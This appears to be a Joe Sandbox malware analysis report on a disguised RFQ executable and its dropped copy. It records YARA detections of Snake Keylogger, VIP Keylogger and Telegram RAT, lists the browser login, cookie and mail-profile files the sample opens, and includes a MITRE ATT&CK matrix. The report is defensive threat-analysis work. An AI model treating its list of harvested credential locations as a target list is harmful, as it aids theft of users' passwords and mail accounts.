Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Queries volume information: C:\Users\user\AppData\Roaming\nDEusQ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Queries volume information: C:\Users\user\AppData\Roaming\nDEusQ.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.2801666248.0000000002961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2800848818.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nDEusQ.exe PID: 7984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nDEusQ.exe PID: 4524, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nDEusQ.exe PID: 7984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nDEusQ.exe PID: 4524, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nDEusQ.exe PID: 7984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nDEusQ.exe PID: 4524, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.2801666248.0000000002961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2800848818.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nDEusQ.exe PID: 7984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nDEusQ.exe PID: 4524, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nDEusQ.exe PID: 7984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nDEusQ.exe PID: 4524, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe